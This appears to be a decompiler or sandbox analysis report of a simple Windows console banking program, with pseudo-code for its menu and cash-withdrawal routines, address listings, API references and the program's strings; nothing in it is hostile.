                                                                      				E00BE3AB0(_t108, _t121, _t122, _t148);
                                                                      				do {
                                                                      					E00BE20E0(_t111, _t121, _t122, __eflags, _t148);
                                                                      					E00BE12B0(0xf, 8);
                                                                      					_push("1. Create New Account\n");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0xa);
                                                                      					_push("2. Cash Deposit");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0xc);
                                                                      					_push("3. Cash Withdrawl");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0xe);
                                                                      					_push("4. Fund Transfer");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0xf, 0x10);
                                                                      					_push("5. Account information");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0x2d, 8);
                                                                      					_push("6. Transaction information");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0x2d, 0xa);
                                                                      					_push("7. Log out");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					E00BE12B0(0x2d, 0xc);
                                                                      					_push("8. Exit");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					_t139 = _t131 + 0x20;
                                                                      					E00BE12B0(1, 0x11);
                                                                      					_v24 = 0;
                                                                      					while(1) {
                                                                      						__eflags = _v24 - 0x4e;
                                                                      						if(__eflags >= 0) {
                                                                      							break;
                                                                      						}
                                                                      						_push("_");
                                                                      						E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      						_t139 = _t139 + 4;
                                                                      						_t111 = _v24 + 1;
                                                                      						__eflags = _t111;
                                                                      						_v24 = _t111;
                                                                      					}
                                                                      					E00BE12B0(0x17, 0x13);
                                                                      					_push("Press a choice between the range [1-8] ");
                                                                      					E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      					_t131 = _t139 + 4;
                                                                      					_v16 = 0x30;
                                                                      					_v16 = _v16 - 1;
                                                                      					__eflags = _v16 - 7;
                                                                      					if(__eflags > 0) {
                                                                      						E00BE20E0(_t111, _t121, _t122, __eflags, _t148);
                                                                      						E00BE12B0(0xa, 0xa);
                                                                      						_push("Your input is out of range! Enter a choice between 1 to 8!");
                                                                      						E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      						E00BE12B0(0xf, 0xc);
                                                                      						_push("Press any key to return to main menu...");
                                                                      						E00BE715C(_t108, _t121, _t122, __eflags);
                                                                      						_t131 = _t131 + 8;
                                                                      					} else {
                                                                      						switch( *((intOrPtr*)(_v16 * 4 +  &M00BE3A88))) {
                                                                      							case 0:
                                                                      								E00BE3DE0(_t108, _t111, _t121, _t122, __eflags, _t148);
                                                                      								goto L35;
                                                                      							case 1:
                                                                      								__eax = E00BE4640(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 2:
                                                                      								__eax = E00BE49E0(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 3:
                                                                      								__eax = E00BE4E90(__ebx, __edi, __esi, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 4:
                                                                      								__eax = E00BE5600(__ebx, __ecx, __eflags, __fp0);
                                                                      								goto L35;
                                                                      							case 5:
                                                                      								__eax = E00BE6190(__ebx, __ecx, __edx, __fp0);
                                                                      								goto L35;
                                                                      							case 6:
                                                                      								E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0) = E00BE12B0(0xf, 0xa);
                                                                      								_push("Are you sure you want to Log out? <Y/N> : ");
                                                                      								__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      								__esp = __esp + 4;
                                                                      								__ecx = _v5;
                                                                      								__eflags = __ecx - 0x59;
                                                                      								if(__eflags == 0) {
                                                                      									L28:
                                                                      									_t40 =  &_v36; // -15
                                                                      									_t40 = E00BE8417(__eflags, _t40);
                                                                      									 *0xc02f28 = E00BE6EF1("LOG.DAT", "a");
                                                                      									_t41 =  &_v36; // -15
                                                                      									__ecx = _t41;
                                                                      									_push(_t41);
                                                                      									_t42 =  &_v80; // -59
                                                                      									__edx = _t42;
                                                                      									_push(_t42);
                                                                      									_push(0xc02f40);
                                                                      									_push(0xc02ee0);
                                                                      									_push("%s %s %s %s\n");
                                                                      									__eax =  *0xc02f28; // 0x0
                                                                      									_push(__eax);
                                                                      									__eax = E00BE6F06(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 0x18;
                                                                      									__ecx =  *0xc02f28; // 0x0
                                                                      									_push(__ecx);
                                                                      									__eax = E00BE6DB6(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 4;
                                                                      									__eax = E00BE3610(__ebx, __edi, __esi, __fp0);
                                                                      								} else {
                                                                      									__edx = _v5;
                                                                      									__eflags = _v5 - 0x79;
                                                                      									if(__eflags == 0) {
                                                                      										goto L28;
                                                                      									}
                                                                      								}
                                                                      								goto L35;
                                                                      							case 7:
                                                                      								E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0) = E00BE12B0(0xf, 0xa);
                                                                      								_push("Are you sure you want to exit? <Y/N> : ");
                                                                      								__eax = E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      								__esp = __esp + 4;
                                                                      								__edx = _v5;
                                                                      								__eflags = _v5 - 0x59;
                                                                      								if(__eflags == 0) {
                                                                      									L32:
                                                                      									_t45 =  &_v36; // -15
                                                                      									__ecx = _t45;
                                                                      									__eax = E00BE8417(__eflags, _t45);
                                                                      									 *0xc02f28 = E00BE6EF1("LOG.DAT", "a");
                                                                      									_t46 =  &_v36; // -15
                                                                      									__edx = _t46;
                                                                      									_push(_t46);
                                                                      									_t47 =  &_v80; // -59
                                                                      									__eax = _t47;
                                                                      									_push(_t47);
                                                                      									_push(0xc02f40);
                                                                      									_push(0xc02ee0);
                                                                      									_push("%s %s %s %s\n");
                                                                      									__ecx =  *0xc02f28; // 0x0
                                                                      									_push(__ecx);
                                                                      									__eax = E00BE6F06(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 0x18;
                                                                      									__edx =  *0xc02f28; // 0x0
                                                                      									_push(__edx);
                                                                      									__eax = E00BE6DB6(__ebx, __edi, __esi, __eflags);
                                                                      									__esp = __esp + 4;
                                                                      									__eax = E00BE77B1(0);
                                                                      								} else {
                                                                      									__eax = _v5;
                                                                      									__eflags = _v5 - 0x79;
                                                                      									if(__eflags == 0) {
                                                                      										goto L32;
                                                                      									}
                                                                      								}
                                                                      								goto L35;
                                                                      						}
                                                                      					}
                                                                      					L35:
                                                                      					__eflags = 1;
                                                                      				} while (1 != 0);
                                                                      				return 1;
                                                                      			}








































                                                                      0x00be3610
                                                                      0x00be3610
                                                                      0x00be3610
                                                                      0x00be3610
                                                                      0x00be3619
                                                                      0x00be361f
                                                                      0x00be3622
                                                                      0x00be3625
                                                                      0x00be3628
                                                                      0x00be362b
                                                                      0x00be362e
                                                                      0x00be3631
                                                                      0x00be3634
                                                                      0x00be3637
                                                                      0x00be363e
                                                                      0x00be3645
                                                                      0x00be364c
                                                                      0x00be3654
                                                                      0x00be365d
                                                                      0x00be3662
                                                                      0x00be3667
                                                                      0x00be3673
                                                                      0x00be3678
                                                                      0x00be367d
                                                                      0x00be368f
                                                                      0x00be369b
                                                                      0x00be36a0
                                                                      0x00be36a5
                                                                      0x00be36aa
                                                                      0x00be36b1
                                                                      0x00be36bc
                                                                      0x00be36bf
                                                                      0x00be36c3
                                                                      0x00be36c5
                                                                      0x00be36ce
                                                                      0x00be36d3
                                                                      0x00be36d8
                                                                      0x00be36e4
                                                                      0x00be36e9
                                                                      0x00be36ee
                                                                      0x00be36f3
                                                                      0x00be36f8
                                                                      0x00be36f8
                                                                      0x00be36fd
                                                                      0x00be370e
                                                                      0x00be3713
                                                                      0x00be3716
                                                                      0x00be371b
                                                                      0x00be3721
                                                                      0x00be3725
                                                                      0x00be372f
                                                                      0x00be3735
                                                                      0x00be373a
                                                                      0x00be3740
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be374b
                                                                      0x00be3750
                                                                      0x00be3755
                                                                      0x00be3763
                                                                      0x00be3768
                                                                      0x00be376d
                                                                      0x00be3775
                                                                      0x00be3775
                                                                      0x00be376d
                                                                      0x00be3778
                                                                      0x00be377a
                                                                      0x00be3780
                                                                      0x00be3781
                                                                      0x00be3786
                                                                      0x00be3789
                                                                      0x00be378e
                                                                      0x00be3792
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3794
                                                                      0x00be3798
                                                                      0x00be379d
                                                                      0x00be37a2
                                                                      0x00be37a7
                                                                      0x00be37b3
                                                                      0x00be37b3
                                                                      0x00be37bf
                                                                      0x00be37c4
                                                                      0x00be37c7
                                                                      0x00be37cc
                                                                      0x00be37cc
                                                                      0x00be37d5
                                                                      0x00be37da
                                                                      0x00be37df
                                                                      0x00be37eb
                                                                      0x00be37f0
                                                                      0x00be37f5
                                                                      0x00be3801
                                                                      0x00be3806
                                                                      0x00be380b
                                                                      0x00be3817
                                                                      0x00be381c
                                                                      0x00be3821
                                                                      0x00be382d
                                                                      0x00be3832
                                                                      0x00be3837
                                                                      0x00be3843
                                                                      0x00be3848
                                                                      0x00be384d
                                                                      0x00be3859
                                                                      0x00be385e
                                                                      0x00be3863
                                                                      0x00be386f
                                                                      0x00be3874
                                                                      0x00be3879
                                                                      0x00be387e
                                                                      0x00be3885
                                                                      0x00be388a
                                                                      0x00be389c
                                                                      0x00be389c
                                                                      0x00be38a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38a2
                                                                      0x00be38a7
                                                                      0x00be38ac
                                                                      0x00be3896
                                                                      0x00be3896
                                                                      0x00be3899
                                                                      0x00be3899
                                                                      0x00be38b5
                                                                      0x00be38ba
                                                                      0x00be38bf
                                                                      0x00be38c4
                                                                      0x00be38c7
                                                                      0x00be38d4
                                                                      0x00be38d7
                                                                      0x00be38db
                                                                      0x00be3a43
                                                                      0x00be3a4c
                                                                      0x00be3a51
                                                                      0x00be3a56
                                                                      0x00be3a62
                                                                      0x00be3a67
                                                                      0x00be3a6c
                                                                      0x00be3a71
                                                                      0x00be38e1
                                                                      0x00be38e4
                                                                      0x00000000
                                                                      0x00be38eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38f5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38ff
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3909
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3913
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be391d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3930
                                                                      0x00be3935
                                                                      0x00be393a
                                                                      0x00be393f
                                                                      0x00be3942
                                                                      0x00be3946
                                                                      0x00be3949
                                                                      0x00be3954
                                                                      0x00be3954
                                                                      0x00be3958
                                                                      0x00be3972
                                                                      0x00be3977
                                                                      0x00be3977
                                                                      0x00be397a
                                                                      0x00be397b
                                                                      0x00be397b
                                                                      0x00be397e
                                                                      0x00be397f
                                                                      0x00be3984
                                                                      0x00be3989
                                                                      0x00be398e
                                                                      0x00be3993
                                                                      0x00be3994
                                                                      0x00be3999
                                                                      0x00be399c
                                                                      0x00be39a2
                                                                      0x00be39a3
                                                                      0x00be39a8
                                                                      0x00be39ab
                                                                      0x00be394b
                                                                      0x00be394b
                                                                      0x00be394f
                                                                      0x00be3952
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be3952
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be39be
                                                                      0x00be39c3
                                                                      0x00be39c8
                                                                      0x00be39cd
                                                                      0x00be39d0
                                                                      0x00be39d4
                                                                      0x00be39d7
                                                                      0x00be39e2
                                                                      0x00be39e2
                                                                      0x00be39e2
                                                                      0x00be39e6
                                                                      0x00be3a00
                                                                      0x00be3a05
                                                                      0x00be3a05
                                                                      0x00be3a08
                                                                      0x00be3a09
                                                                      0x00be3a09
                                                                      0x00be3a0c
                                                                      0x00be3a0d
                                                                      0x00be3a12
                                                                      0x00be3a17
                                                                      0x00be3a1c
                                                                      0x00be3a22
                                                                      0x00be3a23
                                                                      0x00be3a28
                                                                      0x00be3a2b
                                                                      0x00be3a31
                                                                      0x00be3a32
                                                                      0x00be3a37
                                                                      0x00be3a3c
                                                                      0x00be39d9
                                                                      0x00be39d9
                                                                      0x00be39dd
                                                                      0x00be39e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be39e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00be38e4
                                                                      0x00be3a74
                                                                      0x00be3a79
                                                                      0x00be3a79
                                                                      0x00be3a84

                                                                      APIs
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE139D
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13DB
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE13FC
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1470
                                                                        • Part of subcall function 00BE1380: _wprintf.LIBCMT ref: 00BE1493
                                                                        • Part of subcall function 00BE12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D1
                                                                        • Part of subcall function 00BE12B0: SetConsoleCursorPosition.KERNEL32(00000000,?,00BE1393,?,?,?,00BE1233), ref: 00BE12D8
                                                                      • _wprintf.LIBCMT ref: 00BE3667
                                                                      • _wprintf.LIBCMT ref: 00BE367D
                                                                        • Part of subcall function 00BE715C: __stbuf.LIBCMT ref: 00BE71A8
                                                                        • Part of subcall function 00BE715C: __output_s_l.LIBCMT ref: 00BE71C2
                                                                        • Part of subcall function 00BE715C: __ftbuf.LIBCMT ref: 00BE71D6
                                                                      • _wscanf.LIBCMT ref: 00BE368F
                                                                        • Part of subcall function 00BE738B: _vwscanf.LIBCMT ref: 00BE739C
                                                                      • _wprintf.LIBCMT ref: 00BE36A5
                                                                        • Part of subcall function 00BE12F0: _wprintf.LIBCMT ref: 00BE1329
                                                                      • _wprintf.LIBCMT ref: 00BE36D8
                                                                      • _wprintf.LIBCMT ref: 00BE3863
                                                                      • _wprintf.LIBCMT ref: 00BE3879
                                                                      • _wprintf.LIBCMT ref: 00BE38A7
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3E21
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3E54
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3E6C
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3E80
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3E94
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3EAA
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3EBB
                                                                        • Part of subcall function 00BE3DE0: _wprintf.LIBCMT ref: 00BE3ED1
                                                                        • Part of subcall function 00BE3DE0: _wscanf.LIBCMT ref: 00BE3EE2
                                                                      • _wprintf.LIBCMT ref: 00BE38BF
                                                                      • _wprintf.LIBCMT ref: 00BE36EE
                                                                        • Part of subcall function 00BE77B1: _doexit.LIBCMT ref: 00BE77BB
                                                                      • _swscanf.LIBCMT ref: 00BE3735
                                                                      • _wprintf.LIBCMT ref: 00BE37A2
                                                                      • __wstrtime.LIBCMT ref: 00BE37BF
                                                                      • _wprintf.LIBCMT ref: 00BE37DF
                                                                      • _wprintf.LIBCMT ref: 00BE37F5
                                                                      • _wprintf.LIBCMT ref: 00BE380B
                                                                      • _wprintf.LIBCMT ref: 00BE3821
                                                                      • _wprintf.LIBCMT ref: 00BE3837
                                                                      • _wprintf.LIBCMT ref: 00BE384D
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE20FF
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE213E
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE215F
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE216C
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE2188
                                                                        • Part of subcall function 00BE20E0: __wstrtime.LIBCMT ref: 00BE2195
                                                                        • Part of subcall function 00BE20E0: _wprintf.LIBCMT ref: 00BE21C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.224908255.0000000000BE1000.00000020.00020000.sdmp, Offset: 00BE0000, based on PE: true
                                                                      • Associated: 00000001.00000002.224904531.0000000000BE0000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224920014.0000000000BF8000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224925639.0000000000BFF000.00000008.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.224930208.0000000000C05000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _wprintf$_wscanf$__wstrtime$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                                                      • String ID: %s %s %s$%s %s %s %s$%s %s %s %s$0$1. Create New Account$2. Cash Deposit$3. Cash Withdrawl$4. Fund Transfer$5. Account information$6. Transaction information$7. Log out$8. Exit$Are you sure you want to Log out? <Y/N> : $Are you sure you want to exit? <Y/N> : $Enter User name : $LOG.DAT$LOG.DAT$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to exit the program...$Press a choice between the range [1-8] $Press any key to return to main menu...$USER.DAT$Your input is out of range! Enter a choice between 1 to 8!
                                                                      • API String ID: 1611355571-1720101819
                                                                      • Opcode ID: 024ae8018a140aaeff9ea5399e75ce3ef49445916e903a3d2a4bbe4d57439e31
                                                                      • Instruction ID: cdcc38dca99fbaba93e8f43368d1ece73405317bbf21db68e821cc6e1125f998
                                                                      • Opcode Fuzzy Hash: 024ae8018a140aaeff9ea5399e75ce3ef49445916e903a3d2a4bbe4d57439e31
                                                                      • Instruction Fuzzy Hash: 6BA173B1E8438A6AE710BBE69C47FAD72E05F11B40F1041F5F6057A2C2EBB156488767
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 43%
                                                                      			E00BE49E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                      				char _v5;
                                                                      				char _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v40;
                                                                      				char _v42;
                                                                      				char _v62;
                                                                      				char _v112;
                                                                      				char _v113;
                                                                      				char _v125;
                                                                      				char _v140;
                                                                      				char _v170;
                                                                      				char _v200;
                                                                      				char _v208;
                                                                      				char _v244;
                                                                      				char _v324;
                                                                      				char _v376;
                                                                      				char _v456;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t64;
                                                                      				intOrPtr _t70;
                                                                      				intOrPtr _t75;
                                                                      				void* _t76;
                                                                      				intOrPtr _t77;
                                                                      				void* _t81;
                                                                      				char _t97;
                                                                      				intOrPtr _t99;
                                                                      				void* _t104;
                                                                      				intOrPtr _t105;
                                                                      				intOrPtr _t110;
                                                                      				void* _t117;
                                                                      				void* _t122;
                                                                      				void* _t127;
                                                                      				intOrPtr _t147;
                                                                      				intOrPtr _t148;
                                                                      				intOrPtr _t168;
                                                                      				intOrPtr _t173;
                                                                      				void* _t177;
                                                                      				void* _t180;
                                                                      				void* _t184;
                                                                      				void* _t185;
                                                                      				void* _t193;
                                                                      				void* _t195;
                                                                      				void* _t196;
                                                                      				void* _t205;
                                                                      
                                                                      				_t215 = __fp0;
                                                                      				_t176 = __esi;
                                                                      				_t175 = __edi;
                                                                      				_t132 = __ecx;
                                                                      				_t131 = __ebx;
                                                                      				_v16 = 0;
                                                                      				E00BE20E0(__ecx, __edi, __esi, __eflags, __fp0);
                                                                      				E00BE12B0(5, 0xa);
                                                                      				_push("Withdraw from A/C number          : ");
                                                                      				E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      				E00BE738B("%s",  &_v28);
                                                                      				_t64 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      				_t180 = _t177 + 0x14;
                                                                      				 *0xc02f28 = _t64;
                                                                      				_t214 = _v16;
                                                                      				if(_v16 == 0) {
                                                                      					E00BE20E0(_t132, __edi, __esi, _t214, __fp0);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Given A/C number does not exits!");
                                                                      					return E00BE715C(__ebx, _t175, _t176, _t214);
                                                                      				}
                                                                      				E00BE12B0(0x32, 0xa);
                                                                      				_push( &_v376);
                                                                      				_push("[ %s ]");
                                                                      				E00BE715C(__ebx, __edi, __esi, __eflags);
                                                                      				E00BE12B0(5, 0xc);
                                                                      				_push("Amount to be Withdrawn (in NRs.)  : ");
                                                                      				E00BE715C(__ebx, _t175, _t176, __eflags);
                                                                      				E00BE738B("%f",  &_v12);
                                                                      				_t70 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      				_t184 = _t180 + 0x1c;
                                                                      				 *0xc02f28 = _t70;
                                                                      				_v16 = 0;
                                                                      				while(1) {
                                                                      					_push( &_v32);
                                                                      					_push( &_v36);
                                                                      					_push( &_v40);
                                                                      					_push( &_v42);
                                                                      					_push( &_v140);
                                                                      					_push( &_v113);
                                                                      					_push( &_v62);
                                                                      					_push( &_v112);
                                                                      					_push( &_v125);
                                                                      					_push( &_v170);
                                                                      					_push( &_v200);
                                                                      					_t75 =  *0xc02f28; // 0x0
                                                                      					_t76 = E00BE7021(_t75, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                                      					_t185 = _t184 + 0x38;
                                                                      					__eflags = _t76 - 0xffffffff;
                                                                      					if(__eflags == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t122 = E00BE8230( &_v208,  &_v28);
                                                                      					_t184 = _t185 + 8;
                                                                      					__eflags = _t122;
                                                                      					if(__eflags == 0) {
                                                                      						asm("movss xmm0, [ebp-0x8]");
                                                                      						asm("comiss xmm0, [ebp-0x1c]");
                                                                      						if(__eflags > 0) {
                                                                      							E00BE20E0( &_v28, _t175, _t176, __eflags, _t215);
                                                                      							E00BE12B0(0x14, 0xc);
                                                                      							asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                                      							asm("movsd [esp], xmm0");
                                                                      							_push("Sorry, the current balance is Rs. %.2f only!");
                                                                      							E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      							E00BE12B0(0x19, 0xe);
                                                                      							_push("Transaction NOT completed!");
                                                                      							_t127 = E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      							_v16 = 1;
                                                                      							return _t127;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t77 =  *0xc02f28; // 0x0
                                                                      				_push(_t77);
                                                                      				E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      				E00BE20E0( &_v200, _t175, _t176, __eflags, _t215);
                                                                      				E00BE12B0(0x1e, 0xa);
                                                                      				_push("Confirm Transaction");
                                                                      				_t81 = E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				asm("movss xmm0, [ebp-0x8]");
                                                                      				asm("movss [esp], xmm0");
                                                                      				E00BE1870(_t81,  &_v244);
                                                                      				E00BE12B0(3, 0xc);
                                                                      				_push( &_v376);
                                                                      				_push( &_v28);
                                                                      				E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      				asm("movsd [esp], xmm0");
                                                                      				E00BE1B30( &_v456, "%s to be Withdrawn from A/C number : %s [%s]",  &_v244);
                                                                      				E00BE8140( &_v324,  &_v456);
                                                                      				E00BE8140( &_v324, "]");
                                                                      				E00BE12B0(0x28 - (E00BE82C0( &_v324) >> 1), 0xe);
                                                                      				_push( &_v324);
                                                                      				E00BE7229(_t131, _t175, _t176, __eflags);
                                                                      				E00BE12B0(8, 0x11);
                                                                      				_push("Are you sure you want to perform this tranasction? <Y/N>");
                                                                      				E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				_t193 = _t185 + 0x14 - 8 + 0x1c;
                                                                      				_t97 = _v5;
                                                                      				__eflags = _t97 - 0x59;
                                                                      				if(_t97 == 0x59) {
                                                                      					L10:
                                                                      					 *0xc02f28 = E00BE6EF1("ACCOUNT.DAT", "r");
                                                                      					_t99 = E00BE6EF1("TEMP.DAT", "w");
                                                                      					_t195 = _t193 + 0x10;
                                                                      					 *0xc02f24 = _t99;
                                                                      					_v16 = 0;
                                                                      					while(1) {
                                                                      						_push( &_v32);
                                                                      						_push( &_v36);
                                                                      						_push( &_v40);
                                                                      						_push( &_v42);
                                                                      						_push( &_v140);
                                                                      						_push( &_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_t168 =  *0xc02f28; // 0x0
                                                                      						_t104 = E00BE7021(_t168, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
                                                                      						_t196 = _t195 + 0x38;
                                                                      						__eflags = _t104 - 0xffffffff;
                                                                      						if(__eflags == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t117 = E00BE8230( &_v208,  &_v28);
                                                                      						_t205 = _t196 + 8;
                                                                      						__eflags = _t117;
                                                                      						if(__eflags == 0) {
                                                                      							asm("movss xmm0, [ebp-0x24]");
                                                                      							asm("subss xmm0, [ebp-0x8]");
                                                                      							asm("movss [ebp-0x24], xmm0");
                                                                      						}
                                                                      						asm("movss xmm0, [0xbf8210]");
                                                                      						asm("comiss xmm0, [ebp-0x24]");
                                                                      						if(__eflags > 0) {
                                                                      							asm("movss xmm0, [ebp-0x20]");
                                                                      							asm("addss xmm0, [ebp-0x24]");
                                                                      							asm("movss [ebp-0x20], xmm0");
                                                                      							asm("movss xmm0, [0xbf8210]");
                                                                      							asm("movss [ebp-0x24], xmm0");
                                                                      						}
                                                                      						asm("movss xmm0, [ebp-0x24]");
                                                                      						asm("addss xmm0, [ebp-0x20]");
                                                                      						asm("movss [ebp-0x1c], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x1c]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x20]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						asm("cvtss2sd xmm0, [ebp-0x24]");
                                                                      						asm("movsd [esp], xmm0");
                                                                      						_push(_v42);
                                                                      						_push( &_v140);
                                                                      						_push(_v113);
                                                                      						_push( &_v62);
                                                                      						_push( &_v112);
                                                                      						_push( &_v125);
                                                                      						_push( &_v170);
                                                                      						_push( &_v200);
                                                                      						_push( &_v208);
                                                                      						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
                                                                      						_t173 =  *0xc02f24; // 0x0
                                                                      						_push(_t173);
                                                                      						E00BE6F06(_t131, _t175, _t176, __eflags);
                                                                      						_t195 = _t205 - 0xfffffffffffffff8 + 0x44;
                                                                      					}
                                                                      					_t105 =  *0xc02f24; // 0x0
                                                                      					_push(_t105);
                                                                      					E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      					_t147 =  *0xc02f28; // 0x0
                                                                      					_push(_t147);
                                                                      					E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      					 *0xc02f28 = E00BE6EF1("TRANSACTION.DAT", "a");
                                                                      					E00BE8417(__eflags, 0xc02f30);
                                                                      					_push(0xc02ee4);
                                                                      					asm("cvtss2sd xmm0, [ebp-0x8]");
                                                                      					asm("movsd [esp], xmm0");
                                                                      					_push(0xc02f30);
                                                                      					_push(0xc02f40);
                                                                      					_push("Cash+Withdrawn");
                                                                      					_push( &_v28);
                                                                      					_push("%s %s %s %s %.2f %s\n");
                                                                      					_t110 =  *0xc02f28; // 0x0
                                                                      					_push(_t110);
                                                                      					E00BE6F06(_t131, _t175, _t176, __eflags);
                                                                      					_t148 =  *0xc02f28; // 0x0
                                                                      					_push(_t148);
                                                                      					E00BE6DB6(_t131, _t175, _t176, __eflags);
                                                                      					E00BE20E0(_t148, _t175, _t176, __eflags, _t215);
                                                                      					E00BE12B0(0x14, 0xc);
                                                                      					_push("Transaction completed successfully!");
                                                                      					return E00BE715C(_t131, _t175, _t176, __eflags);
                                                                      				}
                                                                      				__eflags = _v5 - 0x79;
                                                                      				if(_v5 == 0x79) {
                                                                      					goto L10;
                                                                      				}
                                                                      				return _t97;
                                                                      			}


















































                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e0
                                                                      0x00be49e9
                                                                      0x00be49f0
                                                                      0x00be49f9
                                                                      0x00be49fe
                                                                      0x00be4a03
                                                                      0x00be4a14
                                                                      0x00be4a26
                                                                      0x00be4a2b
                                                                      0x00be4a2e
                                                                      0x00be4a33
                                                                      0x00be4a37
                                                                      0x00be4a39
                                                                      0x00be4a42
                                                                      0x00be4a47
                                                                      0x00000000
                                                                      0x00be4a51
                                                                      0x00be4a5d
                                                                      0x00be4a68
                                                                      0x00be4a69
                                                                      0x00be4a6e
                                                                      0x00be4a7a
                                                                      0x00be4a7f
                                                                      0x00be4a84
                                                                      0x00be4a95
                                                                      0x00be4aa7
                                                                      0x00be4aac
                                                                      0x00be4aaf
                                                                      0x00be4ab4
                                                                      0x00be4abb
                                                                      0x00be4abe
                                                                      0x00be4ac2
                                                                      0x00be4ac6
                                                                      0x00be4aca
                                                                      0x00be4ad1
                                                                      0x00be4ad5
